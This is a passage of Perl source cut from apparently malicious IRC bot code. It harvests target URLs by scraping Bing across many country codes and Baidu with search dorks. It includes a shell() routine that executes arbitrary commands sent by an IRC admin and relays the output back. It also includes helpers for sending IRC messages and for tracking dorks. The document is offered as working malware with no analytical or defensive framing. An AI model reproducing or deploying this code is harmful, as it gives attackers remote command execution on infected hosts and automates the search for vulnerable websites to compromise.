("http://www.bing.com/search?q=".uri_escape($key)."&cc=se&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingSE/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(4); sub bingCH() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=50) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=ch&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingCH/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingNZ() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=50) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=nz&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingNZ/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingRU() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=50) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=ru&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingRU/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingJP() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=50) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=jp&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingJP/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingCN() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=50) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=cn&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingCN/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingKR() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=50) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=kr&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingKR/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(4); sub bingMX() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=50) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=mx&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingMX/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingAR() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=50) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=ar&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingAR/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingCL() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=50) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=cl&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingCL/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub baidu() { my @list; my $key = $_[0]; my $b = 0; for ($b=0; $b<=500; $b+=10) { my $search = ("http://www.baidu.com/s?wd=".&key($key)."&pn=".$b); my $res = &search_engine_query($search); while ($res =~ m/\" href=\"http:\/\/(.*?)\" target=/g) { if ($1 !~ /baidu\.com/){ my $link = $1; my @grep = &links($link); push(@list,@grep); } } } return @list; } sub bingAU() { my @list; my $key = $_[0]; for (my $i=1; $i<=600; $i+=50) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=au&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingAU/) { my @grep = links($link); push(@list,@grep); } } } return @list; } ######################################### sub clean() { my @cln = (); my %visit = (); foreach my $element (@_) { $element =~ s/\/+/\//g; next if $visit{$element}++; push @cln, $element; } return @cln; } sub links() { my @list; my $host = $_[0]; my $hdir = $_[0]; $hdir =~ s/(.*)\/[^\/]*$/\1/; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; $host .= "/"; $hdir .= "/"; $host =~ s/\/\//\//g; $hdir =~ s/\/\//\//g; push(@list,$host,$hdir); return @list; } sub search_engine_query() { my $url = $_[0]; $url =~ s/http:\/\///; my $host = $url; my $query = $url; my $page = ""; $host =~ s/href=\"?http:\/\///; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; $query =~ s/$host//; if ($query eq "") { $query = "/"; } eval { my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return; my $sget = "GET $query HTTP/1.0\r\n"; $sget .= "Host: $host\r\n"; $sget .= "Accept: */*\r\n"; $sget .= "User-Agent: $uagent\r\n"; $sget .= "Connetion: Close\r\n\r\n"; print $sock $sget; my @pages = <$sock>; $page = "@pages"; close($sock); }; return $page; } ######################################### sub shell() { my $path = $_[0]; my $cmd = $_[1]; if ($cmd =~ /cd (.*)/) { chdir("$1") || &msg("$path","No such file or directory"); return; } elsif ($pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my @output = `$cmd 2>&1 3>&1`; my $c = 0; foreach my $output (@output) { $c++; chop $output; &msg("$path","$output"); if ($c == 5) { $c = 0; sleep 3; } } exit; }} } sub isAdmin() { my $status = 0; my $nick = $_[0]; if ($nick eq $admin) { $status = 1; } return $status; } sub msg() { return unless $#_ == 1; sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]"); } sub nick() { return unless $#_ == 0; sendraw("NICK $_[0]"); } sub read_dorks() { my $dork = uri_escape($_[0]); my $file = "dorks.txt"; my $success = 0; open (file,"<$file"); while (my $dorkx=<file>) { chop($dorkx); if ($dorkx =~ /$dork/){ $success = 1; } } close file; return $success; } sub write_dorks() { my $dorks = uri_escape($_[0]); my $file = "dorks.txt"; open (filex,">>$file"); print filex $dorks."\n"; close filex; } sub notice() { return unless $#_ == 1; sendraw("NOTICE $_[0] :$_[1]"); }}}}}